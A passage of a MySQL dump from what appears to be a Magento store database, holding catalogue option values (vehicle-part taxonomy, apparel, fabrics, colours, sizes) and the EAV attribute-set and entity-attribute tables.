(5355, 5355, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Storage & Cargo > Motor Vehicle Carrying Rack Accessories'),
(5356, 5356, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Storage & Cargo > Motor Vehicle Carrying Rack Accessories > Vehicle Bicycle Rack Accessories'),
(5357, 5357, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Storage & Cargo > Motor Vehicle Carrying Rack Accessories > Vehicle Ski & Snowboard Rack Accessories'),
(5358, 5358, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Storage & Cargo > Motor Vehicle Carrying Racks'),
(5359, 5359, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Storage & Cargo > Motor Vehicle Carrying Racks > Vehicle Base Rack Systems'),
(5360, 5360, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Storage & Cargo > Motor Vehicle Carrying Racks > Vehicle Bicycle Racks'),
(5361, 5361, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Storage & Cargo > Motor Vehicle Carrying Racks > Vehicle Boat Racks'),
(5362, 5362, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Storage & Cargo > Motor Vehicle Carrying Racks > Vehicle Cargo Racks'),
(5363, 5363, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Storage & Cargo > Motor Vehicle Carrying Racks > Vehicle Fishing Rod Racks'),
(5364, 5364, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Storage & Cargo > Motor Vehicle Carrying Racks > Vehicle Gun Racks'),
(5365, 5365, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Storage & Cargo > Motor Vehicle Carrying Racks > Vehicle Motorcycle & Scooter Racks'),
(5366, 5366, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Storage & Cargo > Motor Vehicle Carrying Racks > Vehicle Ski & Snowboard Racks'),
(5367, 5367, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Storage & Cargo > Motor Vehicle Carrying Racks > Vehicle Water Sport Board Racks'),
(5368, 5368, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Storage & Cargo > Motor Vehicle Loading Ramps'),
(5369, 5369, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Storage & Cargo > Motor Vehicle Trailers'),
(5370, 5370, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Storage & Cargo > Motor Vehicle Trailers > Boat Trailers'),
(5371, 5371, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Storage & Cargo > Motor Vehicle Trailers > Horse & Livestock Trailers'),
(5372, 5372, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Storage & Cargo > Motor Vehicle Trailers > Travel Trailers'),
(5373, 5373, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Storage & Cargo > Motor Vehicle Trailers > Utility & Cargo Trailers'),
(5374, 5374, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Storage & Cargo > Motorcycle Bags & Panniers'),
(5375, 5375, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Storage & Cargo > Truck Bed Storage Boxes & Organizers'),
(5376, 5376, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Storage & Cargo > Vehicle Headrest Hangers & Hooks'),
(5377, 5377, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Storage & Cargo > Vehicle Organizers'),
(5378, 5378, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Watercraft Parts & Accessories'),
(5379, 5379, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Watercraft Parts & Accessories > Docking & Anchoring'),
(5380, 5380, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Watercraft Parts & Accessories > Docking & Anchoring > Anchor Chains'),
(5381, 5381, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Watercraft Parts & Accessories > Docking & Anchoring > Anchor Lines & Ropes'),
(5382, 5382, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Watercraft Parts & Accessories > Docking & Anchoring > Anchor Windlasses'),
(5383, 5383, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Watercraft Parts & Accessories > Docking & Anchoring > Anchors'),
(5384, 5384, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Watercraft Parts & Accessories > Docking & Anchoring > Boat Hooks'),
(5385, 5385, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Watercraft Parts & Accessories > Docking & Anchoring > Boat Ladders'),
(5386, 5386, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Watercraft Parts & Accessories > Docking & Anchoring > Dock Cleats'),
(5387, 5387, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Watercraft Parts & Accessories > Docking & Anchoring > Dock Steps'),
(5388, 5388, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Watercraft Parts & Accessories > Sailboat Parts'),
(5389, 5389, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Watercraft Parts & Accessories > Watercraft Care'),
(5390, 5390, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Watercraft Parts & Accessories > Watercraft Care > Watercraft Cleaners'),
(5391, 5391, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Watercraft Parts & Accessories > Watercraft Care > Watercraft Polishes'),
(5392, 5392, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Watercraft Parts & Accessories > Watercraft Engine Parts'),
(5393, 5393, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Watercraft Parts & Accessories > Watercraft Engine Parts > Watercraft Alternators'),
(5394, 5394, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Watercraft Parts & Accessories > Watercraft Engine Parts > Watercraft Carburetors & Parts'),
(5395, 5395, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Watercraft Parts & Accessories > Watercraft Engine Parts > Watercraft Engine Controls'),
(5396, 5396, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Watercraft Parts & Accessories > Watercraft Engine Parts > Watercraft Ignition Parts'),
(5397, 5397, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Watercraft Parts & Accessories > Watercraft Engine Parts > Watercraft Impellers'),
(5398, 5398, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Watercraft Parts & Accessories > Watercraft Engine Parts > Watercraft Motor Locks'),
(5399, 5399, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Watercraft Parts & Accessories > Watercraft Engine Parts > Watercraft Motor Mounts'),
(5400, 5400, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Watercraft Parts & Accessories > Watercraft Engine Parts > Watercraft Pistons & Parts'),
(5401, 5401, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Watercraft Parts & Accessories > Watercraft Engine Parts > Watercraft Propellers'),
(5402, 5402, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Watercraft Parts & Accessories > Watercraft Engines & Motors'),
(5403, 5403, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Watercraft Parts & Accessories > Watercraft Exhaust Parts'),
(5404, 5404, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Watercraft Parts & Accessories > Watercraft Exhaust Parts > Watercraft Manifolds'),
(5405, 5405, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Watercraft Parts & Accessories > Watercraft Exhaust Parts > Watercraft Mufflers & Parts'),
(5406, 5406, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Watercraft Parts & Accessories > Watercraft Fuel Systems'),
(5407, 5407, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Watercraft Parts & Accessories > Watercraft Fuel Systems > Watercraft Fuel Lines & Parts'),
(5408, 5408, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Watercraft Parts & Accessories > Watercraft Fuel Systems > Watercraft Fuel Meters'),
(5409, 5409, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Watercraft Parts & Accessories > Watercraft Fuel Systems > Watercraft Fuel Pumps & Parts'),
(5410, 5410, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Watercraft Parts & Accessories > Watercraft Fuel Systems > Watercraft Fuel Tanks & Parts'),
(5411, 5411, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Watercraft Parts & Accessories > Watercraft Lighting'),
(5412, 5412, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Watercraft Parts & Accessories > Watercraft Steering Parts'),
(5413, 5413, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Watercraft Parts & Accessories > Watercraft Steering Parts > Watercraft Steering Cables'),
(5414, 5414, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Watercraft Parts & Accessories > Watercraft Steering Parts > Watercraft Steering Wheels'),
(5415, 5415, 0, 'Vehicles & Parts > Vehicles'),
(5416, 5416, 0, 'Vehicles & Parts > Vehicles > Aircraft'),
(5417, 5417, 0, 'Vehicles & Parts > Vehicles > Motor Vehicles'),
(5418, 5418, 0, 'Vehicles & Parts > Vehicles > Motor Vehicles > Cars, Trucks & Vans'),
(5419, 5419, 0, 'Vehicles & Parts > Vehicles > Motor Vehicles > Golf Carts'),
(5420, 5420, 0, 'Vehicles & Parts > Vehicles > Motor Vehicles > Motorcycles & Scooters'),
(5421, 5421, 0, 'Vehicles & Parts > Vehicles > Motor Vehicles > Off-Road and All-Terrain Vehicles'),
(5422, 5422, 0, 'Vehicles & Parts > Vehicles > Motor Vehicles > Off-Road and All-Terrain Vehicles > ATVs & UTVs'),
(5423, 5423, 0, 'Vehicles & Parts > Vehicles > Motor Vehicles > Off-Road and All-Terrain Vehicles > Go Karts & Dune Buggies'),
(5424, 5424, 0, 'Vehicles & Parts > Vehicles > Motor Vehicles > Recreational Vehicles'),
(5425, 5425, 0, 'Vehicles & Parts > Vehicles > Motor Vehicles > Snowmobiles'),
(5426, 5426, 0, 'Vehicles & Parts > Vehicles > Watercraft'),
(5427, 5427, 0, 'Vehicles & Parts > Vehicles > Watercraft > Motor Boats'),
(5428, 5428, 0, 'Vehicles & Parts > Vehicles > Watercraft > Personal Watercraft'),
(5429, 5429, 0, 'Vehicles & Parts > Vehicles > Watercraft > Sailboats'),
(5430, 5430, 0, 'Vehicles & Parts > Vehicles > Watercraft > Yachts'),
(5431, 5431, 0, 'Hike'),
(5432, 5432, 0, 'Outdoor'),
(5433, 5433, 0, 'Running'),
(5434, 5434, 0, 'Warmup'),
(5435, 5435, 0, 'Yoga'),
(5436, 5436, 0, 'Recreation'),
(5437, 5437, 0, 'Lounge'),
(5438, 5438, 0, 'Gym'),
(5439, 5439, 0, 'Climbing'),
(5440, 5440, 0, 'Crosstraining'),
(5441, 5441, 0, 'Post-workout'),
(5442, 5442, 0, 'Cycling'),
(5443, 5443, 0, 'Athletic'),
(5444, 5444, 0, 'Sports'),
(5445, 5445, 0, 'Hiking'),
(5446, 5446, 0, 'Overnight'),
(5447, 5447, 0, 'School'),
(5448, 5448, 0, 'Trail'),
(5449, 5449, 0, 'Travel'),
(5450, 5450, 0, 'Urban'),
(5451, 5451, 0, 'Backpack'),
(5452, 5452, 0, 'Luggage'),
(5453, 5453, 0, 'Duffel'),
(5454, 5454, 0, 'Messenger'),
(5455, 5455, 0, 'Laptop'),
(5456, 5456, 0, 'Exercise'),
(5457, 5457, 0, 'Tote'),
(5458, 5458, 0, 'Burlap'),
(5459, 5459, 0, 'Canvas'),
(5460, 5460, 0, 'Cotton'),
(5461, 5461, 0, 'Faux Leather'),
(5462, 5462, 0, 'Leather'),
(5463, 5463, 0, 'Mesh'),
(5464, 5464, 0, 'Nylon'),
(5465, 5465, 0, 'Polyester'),
(5466, 5466, 0, 'Rayon'),
(5467, 5467, 0, 'Ripstop'),
(5468, 5468, 0, 'Suede'),
(5469, 5469, 0, 'Foam'),
(5470, 5470, 0, 'Metal'),
(5471, 5471, 0, 'Plastic'),
(5472, 5472, 0, 'Rubber'),
(5473, 5473, 0, 'Synthetic'),
(5474, 5474, 0, 'Stainless Steel'),
(5475, 5475, 0, 'Silicone'),
(5488, 5488, 0, 'Adjustable'),
(5489, 5489, 0, 'Cross Body'),
(5490, 5490, 0, 'Detachable'),
(5491, 5491, 0, 'Double'),
(5492, 5492, 0, 'Padded'),
(5493, 5493, 0, 'Shoulder'),
(5494, 5494, 0, 'Single'),
(5495, 5495, 0, 'Telescoping'),
(5496, 5496, 0, 'Audio Pocket'),
(5497, 5497, 0, 'Wheeled'),
(5498, 5498, 0, 'Hydration Pocket'),
(5499, 5499, 0, 'Audio Pocket'),
(5500, 5500, 0, 'Flapover'),
(5501, 5501, 0, 'Waterproof'),
(5502, 5502, 0, 'Lightweight'),
(5503, 5503, 0, 'TSA Approved'),
(5504, 5504, 0, 'Reflective'),
(5505, 5505, 0, 'Laptop Sleeve'),
(5506, 5506, 0, 'Lockable'),
(5507, 5507, 0, 'Men'),
(5508, 5508, 0, 'Women'),
(5509, 5509, 0, 'Boys'),
(5510, 5510, 0, 'Girls'),
(5511, 5511, 0, 'Unisex'),
(5512, 5512, 0, 'Cardio'),
(5513, 5513, 0, 'Electronic'),
(5514, 5514, 0, 'Exercise'),
(5515, 5515, 0, 'Fashion'),
(5516, 5516, 0, 'Hydration'),
(5517, 5517, 0, 'Timepiece'),
(5524, 5529, 0, 'Download'),
(5525, 5530, 0, 'DVD'),
(5526, 5531, 0, 'Base Layer'),
(5527, 5532, 0, 'Basic'),
(5528, 5533, 0, 'Capri'),
(5529, 5534, 0, 'Compression'),
(5530, 5535, 0, 'Leggings'),
(5531, 5536, 0, 'Parachute'),
(5532, 5537, 0, 'Skort'),
(5533, 5538, 0, 'Snug'),
(5534, 5539, 0, 'Sweatpants'),
(5535, 5540, 0, 'Tights'),
(5536, 5541, 0, 'Track Pants'),
(5537, 5542, 0, 'Workout Pants'),
(5538, 5543, 0, 'Insulated'),
(5539, 5544, 0, 'Jacket'),
(5540, 5545, 0, 'Vest'),
(5541, 5546, 0, 'Lightweight'),
(5542, 5547, 0, 'Hooded'),
(5543, 5548, 0, 'Heavy Duty'),
(5544, 5549, 0, 'Rain Coat'),
(5545, 5550, 0, 'Hard Shell'),
(5546, 5551, 0, 'Soft Shell'),
(5547, 5552, 0, 'Windbreaker'),
(5548, 5553, 0, '&frac12; zip'),
(5549, 5554, 0, '&frac14; zip'),
(5550, 5555, 0, 'Full Zip'),
(5551, 5556, 0, 'Reversible'),
(5552, 5557, 0, 'Bra'),
(5553, 5558, 0, 'Hoodie'),
(5554, 5559, 0, 'Sweatshirt'),
(5555, 5560, 0, 'Polo'),
(5556, 5561, 0, 'Tank'),
(5557, 5562, 0, 'Tee'),
(5558, 5563, 0, 'Pullover'),
(5559, 5564, 0, 'Hoodie'),
(5560, 5565, 0, 'Cardigan'),
(5561, 5566, 0, 'Henley'),
(5562, 5567, 0, 'Tunic'),
(5563, 5568, 0, 'Camisole'),
(5564, 5569, 0, 'Cocona&reg; performance fabric'),
(5565, 5570, 0, 'Wool'),
(5566, 5571, 0, 'Fleece'),
(5567, 5572, 0, 'Hemp'),
(5568, 5573, 0, 'Jersey'),
(5569, 5574, 0, 'LumaTech&trade;'),
(5570, 5575, 0, 'Lycra&reg;'),
(5571, 5576, 0, 'Microfiber'),
(5572, 5577, 0, 'Spandex'),
(5573, 5578, 0, 'HeatTec&reg;'),
(5574, 5579, 0, 'EverCool&trade;'),
(5575, 5580, 0, 'Organic Cotton'),
(5576, 5581, 0, 'TENCEL'),
(5577, 5582, 0, 'CoolTech&trade;'),
(5578, 5583, 0, 'Khaki'),
(5579, 5584, 0, 'Linen'),
(5580, 5585, 0, 'Wool'),
(5581, 5586, 0, 'Terry'),
(5582, 5587, 0, 'Sleeve'),
(5583, 5588, 0, 'Long-Sleeve'),
(5584, 5589, 0, 'Short-Sleeve'),
(5585, 5590, 0, 'Sleeveless'),
(5586, 5591, 0, 'Tank'),
(5587, 5592, 0, 'Strap'),
(5602, 5607, 0, 'N/A'),
(5603, 5608, 0, '? zip'),
(5604, 5609, 0, 'Boat Neck'),
(5605, 5610, 0, 'Crew'),
(5606, 5611, 0, 'Full zip'),
(5607, 5612, 0, 'V-neck'),
(5608, 5613, 0, 'Ballet'),
(5609, 5614, 0, 'Scoop'),
(5610, 5615, 0, 'High Collar'),
(5611, 5616, 0, 'Stand Collar'),
(5612, 5617, 0, 'Roll Neck'),
(5613, 5618, 0, 'Square Neck'),
(5614, 5619, 0, 'Color-Blocked'),
(5615, 5620, 0, 'Checked'),
(5616, 5621, 0, 'Color-Blocked'),
(5617, 5622, 0, 'Graphic Print'),
(5618, 5623, 0, 'Solid'),
(5619, 5624, 0, 'Solid-Highlight'),
(5620, 5625, 0, 'Striped'),
(5621, 5626, 0, 'Camo'),
(5622, 5627, 0, 'Geometric'),
(5623, 5628, 0, 'All-Weather'),
(5624, 5629, 0, 'Cold'),
(5625, 5630, 0, 'Cool'),
(5626, 5631, 0, 'Indoor'),
(5627, 5632, 0, 'Mild'),
(5628, 5633, 0, 'Rainy'),
(5629, 5634, 0, 'Spring'),
(5630, 5635, 0, 'Warm'),
(5631, 5636, 0, 'Windy'),
(5632, 5637, 0, 'Wintry'),
(5633, 5638, 0, 'Hot'),
(5634, 5476, 0, 'Black'),
(5635, 5477, 0, 'Blue'),
(5636, 5478, 0, 'Brown'),
(5637, 5479, 0, 'Gray'),
(5638, 5480, 0, 'Green'),
(5639, 5481, 0, 'Lavender'),
(5640, 5482, 0, 'Multi'),
(5641, 5483, 0, 'Orange'),
(5642, 5484, 0, 'Purple'),
(5643, 5485, 0, 'Red'),
(5644, 5486, 0, 'White'),
(5645, 5487, 0, 'Yellow'),
(5646, 5518, 0, '55 cm'),
(5647, 5593, 0, 'XS'),
(5648, 5519, 0, '65 cm'),
(5649, 5594, 0, 'S'),
(5650, 5520, 0, '75 cm'),
(5651, 5595, 0, 'M'),
(5652, 5521, 0, '6 foot'),
(5653, 5596, 0, 'L'),
(5654, 5522, 0, '8 foot'),
(5655, 5597, 0, 'XL'),
(5656, 5523, 0, '10 foot'),
(5657, 5598, 0, '28'),
(5658, 5599, 0, '29'),
(5659, 5600, 0, '30'),
(5660, 5601, 0, '31'),
(5661, 5602, 0, '32'),
(5662, 5603, 0, '33'),
(5663, 5604, 0, '34'),
(5664, 5605, 0, '36'),
(5665, 5606, 0, '38');

-- --------------------------------------------------------

--
-- Table structure for table `eav_attribute_set`
--

CREATE TABLE `eav_attribute_set` (
  `attribute_set_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Attribute Set ID',
  `entity_type_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity Type ID',
  `attribute_set_name` varchar(255) DEFAULT NULL COMMENT 'Attribute Set Name',
  `sort_order` smallint(6) NOT NULL DEFAULT 0 COMMENT 'Sort Order'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Eav Attribute Set';

--
-- Dumping data for table `eav_attribute_set`
--

INSERT INTO `eav_attribute_set` (`attribute_set_id`, `entity_type_id`, `attribute_set_name`, `sort_order`) VALUES
(1, 1, 'Default', 2),
(2, 2, 'Default', 2),
(3, 3, 'Default', 1),
(4, 4, 'Default', 1),
(5, 5, 'Default', 1),
(6, 6, 'Default', 1),
(7, 7, 'Default', 1),
(8, 8, 'Default', 1),
(9, 4, 'Top', 0),
(10, 4, 'Bottom', 0),
(11, 4, 'Gear', 0),
(12, 4, 'Sprite Stasis Ball', 0),
(13, 4, 'Sprite Yoga Strap', 0),
(14, 4, 'Downloadable', 0),
(15, 4, 'Bag', 0);

-- --------------------------------------------------------

--
-- Table structure for table `eav_entity`
--

CREATE TABLE `eav_entity` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `entity_type_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity Type ID',
  `attribute_set_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Attribute Set ID',
  `increment_id` varchar(50) DEFAULT NULL COMMENT 'Increment ID',
  `parent_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Parent ID',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Created At',
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Updated At',
  `is_active` smallint(5) UNSIGNED NOT NULL DEFAULT 1 COMMENT 'Defines Is Entity Active'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Eav Entity';

-- --------------------------------------------------------

--
-- Table structure for table `eav_entity_attribute`
--

CREATE TABLE `eav_entity_attribute` (
  `entity_attribute_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity Attribute ID',
  `entity_type_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity Type ID',
  `attribute_set_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Attribute Set ID',
  `attribute_group_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Attribute Group ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Attribute ID',
  `sort_order` smallint(6) NOT NULL DEFAULT 0 COMMENT 'Sort Order'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Eav Entity Attributes';

--
-- Dumping data for table `eav_entity_attribute`
--

INSERT INTO `eav_entity_attribute` (`entity_attribute_id`, `entity_type_id`, `attribute_set_id`, `attribute_group_id`, `attribute_id`, `sort_order`) VALUES
(1, 1, 1, 1, 1, 10),
(2, 1, 1, 1, 2, 20),
(3, 1, 1, 1, 3, 20),
(4, 1, 1, 1, 4, 30),
(5, 1, 1, 1, 5, 40),
(6, 1, 1, 1, 6, 50),
(7, 1, 1, 1, 7, 60),
(8, 1, 1, 1, 8, 70),
(9, 1, 1, 1, 9, 80),
(10, 1, 1, 1, 10, 25),
(11, 1, 1, 1, 11, 90),
(12, 1, 1, 1, 12, 81),
(13, 1, 1, 1, 13, 115),
(14, 1, 1, 1, 14, 120),
(15, 1, 1, 1, 15, 82),
(16, 1, 1, 1, 16, 83),
(17, 1, 1, 1, 17, 100),
(18, 1, 1, 1, 18, 0),
(19, 1, 1, 1, 19, 0),
(20, 1, 1, 1, 20, 110),
(21, 1, 1, 1, 21, 28),
(22, 2, 2, 2, 22, 10),
(23, 2, 2, 2, 23, 20),
(24, 2, 2, 2, 24, 30),
(25, 2, 2, 2, 25, 40),
(26, 2, 2, 2, 26, 50),
(27, 2, 2, 2, 27, 60),
(28, 2, 2, 2, 28, 70),
(29, 2, 2, 2, 29, 80),
(30, 2, 2, 2, 30, 90),
(31, 2, 2, 2, 31, 100),
(32, 2, 2, 2, 32, 100),
(33, 2, 2, 2, 33, 110),
(34, 2, 2, 2, 34, 120),
(35, 2, 2, 2, 35, 130),
(36, 2, 2, 2, 36, 140),
(37, 2, 2, 2, 37, 132),
(38, 2, 2, 2, 38, 133),
(39, 2, 2, 2, 39, 134),
(40, 2, 2, 2, 40, 135),
(41, 1, 1, 1, 41, 87),
(42, 1, 1, 1, 42, 100),
(43, 1, 1, 1, 43, 110),
(44, 1, 1, 1, 44, 120),
(45, 3, 3, 4, 45, 1),
(46, 3, 3, 4, 46, 2),
(47, 3, 3, 4, 47, 4),
(48, 3, 3, 4, 48, 5),
(49, 3, 3, 4, 49, 6),
(50, 3, 3, 4, 50, 7),
(51, 3, 3, 4, 51, 8),
(52, 3, 3, 5, 52, 10),
(53, 3, 3, 5, 53, 20),
(54, 3, 3, 5, 54, 30),
(55, 3, 3, 4, 55, 12),
(56, 3, 3, 4, 56, 13),
(57, 3, 3, 4, 57, 14),
(58, 3, 3, 4, 58, 15),
(59, 3, 3, 4, 59, 16),
(60, 3, 3, 6, 60, 10),
(61, 3, 3, 6, 61, 30),
(62, 3, 3, 6, 62, 40),
(63, 3, 3, 6, 63, 50),
(64, 3, 3, 6, 64, 60),
(65, 3, 3, 4, 65, 24),
(66, 3, 3, 4, 66, 25),
(67, 3, 3, 5, 67, 40),
(68, 3, 3, 5, 68, 50),
(69, 3, 3, 4, 69, 10),
(70, 3, 3, 6, 70, 5),
(71, 3, 3, 6, 71, 6),
(72, 3, 3, 5, 72, 51),
(73, 4, 4, 7, 73, 10),
(74, 4, 4, 7, 74, 20),
(75, 4, 4, 13, 75, 90),
(76, 4, 4, 13, 76, 100),
(77, 4, 4, 7, 77, 30),
(78, 4, 4, 8, 78, 3),
(79, 4, 4, 8, 79, 4),
(80, 4, 4, 8, 80, 5),
(81, 4, 4, 8, 81, 6),
(82, 4, 4, 7, 82, 70),
(83, 4, 4, 9, 84, 20),
(84, 4, 4, 9, 85, 30),
(85, 4, 4, 9, 86, 40),
(86, 4, 4, 10, 87, 1),
(87, 4, 4, 10, 88, 2),
(88, 4, 4, 10, 89, 3),
(89, 4, 4, 10, 90, 4),
(90, 4, 4, 7, 91, 6),
(91, 4, 4, 8, 92, 7),
(92, 4, 4, 7, 94, 90),
(93, 4, 4, 7, 95, 100),
(94, 4, 4, 10, 96, 5),
(95, 4, 4, 7, 97, 5),
(96, 4, 4, 8, 98, 8),
(97, 4, 4, 7, 99, 80),
(98, 4, 4, 14, 100, 40),
(99, 4, 4, 14, 101, 20),
(100, 4, 4, 14, 102, 30),
(101, 4, 4, 11, 103, 10),
(102, 4, 4, 11, 104, 5),
(103, 4, 4, 7, 105, 80),
(104, 4, 4, 11, 106, 6),
(105, 4, 4, 7, 107, 14),
(106, 4, 4, 7, 108, 15),
(107, 4, 4, 7, 109, 16),
(108, 4, 4, 7, 110, 17),
(109, 4, 4, 7, 111, 18),
(110, 4, 4, 7, 112, 19),
(111, 4, 4, 7, 113, 20),
(112, 4, 4, 7, 114, 110),
(113, 4, 4, 7, 115, 60),
(114, 4, 4, 14, 116, 50),
(115, 4, 4, 11, 117, 51),
(116, 3, 3, 6, 118, 51),
(117, 4, 4, 8, 119, 9),
(118, 4, 4, 8, 120, 10),
(119, 3, 3, 4, 121, 3),
(120, 3, 3, 4, 122, 17),
(121, 4, 4, 9, 123, 10),
(122, 4, 4, 7, 124, 11),
(123, 4, 4, 7, 125, 111),
(124, 4, 4, 7, 126, 112),
(125, 4, 4, 7, 127, 113),
(126, 4, 4, 7, 128, 114),
(127, 4, 4, 19, 129, 10),
(128, 4, 4, 7, 130, 115),
(129, 4, 4, 7, 131, 31),
(130, 4, 4, 7, 132, 21),
(131, 4, 4, 7, 133, 71),
(132, 4, 4, 8, 134, 11),
(133, 4, 4, 20, 135, 1),
(134, 4, 4, 10, 136, 3),
(135, 4, 4, 7, 137, 40),
(136, 4, 9, 21, 129, 10),
(137, 4, 9, 23, 101, 20),
(138, 4, 9, 23, 102, 30),
(139, 4, 9, 23, 100, 40),
(140, 4, 9, 23, 116, 50),
(141, 4, 9, 24, 104, 5),
(142, 4, 9, 24, 106, 6),
(143, 4, 9, 24, 103, 10),
(144, 4, 9, 24, 117, 51),
(145, 4, 9, 25, 78, 3),
(146, 4, 9, 25, 79, 4),
(147, 4, 9, 25, 80, 5),
(148, 4, 9, 25, 81, 6),
(149, 4, 9, 25, 92, 7),
(150, 4, 9, 25, 98, 8),
(151, 4, 9, 25, 119, 9),
(152, 4, 9, 25, 120, 10),
(153, 4, 9, 25, 134, 11),
(154, 4, 9, 26, 123, 10),
(155, 4, 9, 26, 84, 20),
(156, 4, 9, 26, 85, 30),
(157, 4, 9, 26, 86, 40),
(158, 4, 9, 27, 87, 1),
(159, 4, 9, 27, 88, 2),
(160, 4, 9, 27, 89, 3),
(161, 4, 9, 27, 136, 3),
(162, 4, 9, 27, 90, 4),
(163, 4, 9, 27, 96, 5),
(164, 4, 9, 28, 135, 1),
(165, 4, 9, 29, 75, 90),
(166, 4, 9, 29, 76, 100),
(167, 4, 9, 30, 97, 5),
(168, 4, 9, 30, 91, 6),
(169, 4, 9, 30, 73, 10),
(170, 4, 9, 30, 124, 11),
(171, 4, 9, 30, 107, 14),
(172, 4, 9, 30, 108, 15),
(173, 4, 9, 30, 109, 16),
(174, 4, 9, 30, 110, 17),
(175, 4, 9, 30, 111, 18),
(176, 4, 9, 30, 112, 19),
(177, 4, 9, 30, 74, 20),
(178, 4, 9, 30, 113, 20),
(179, 4, 9, 30, 132, 21),
(180, 4, 9, 30, 77, 30),
(181, 4, 9, 30, 131, 31),
(182, 4, 9, 30, 137, 40),
(183, 4, 9, 30, 115, 60),
(184, 4, 9, 30, 82, 70),
(185, 4, 9, 30, 133, 71),
(186, 4, 9, 30, 99, 80),
(187, 4, 9, 30, 105, 80),
(188, 4, 9, 30, 94, 90),
(189, 4, 9, 30, 95, 100),
(190, 4, 9, 30, 114, 110),
(191, 4, 9, 30, 125, 111),
(192, 4, 9, 30, 126, 112),
(193, 4, 9, 30, 127, 113),
(194, 4, 9, 30, 128, 114),
(195, 4, 9, 30, 130, 115),
(197, 4, 9, 30, 138, 1000),
(198, 4, 10, 31, 129, 10),
(199, 4, 10, 33, 101, 20),
(200, 4, 10, 33, 102, 30),
(201, 4, 10, 33, 100, 40),
(202, 4, 10, 33, 116, 50),
(203, 4, 10, 34, 104, 5),
(204, 4, 10, 34, 106, 6),
(205, 4, 10, 34, 103, 10),
(206, 4, 10, 34, 117, 51),
(207, 4, 10, 35, 78, 3),
(208, 4, 10, 35, 79, 4),
(209, 4, 10, 35, 80, 5),
(210, 4, 10, 35, 81, 6),
(211, 4, 10, 35, 92, 7),
(212, 4, 10, 35, 98, 8),
(213, 4, 10, 35, 119, 9),
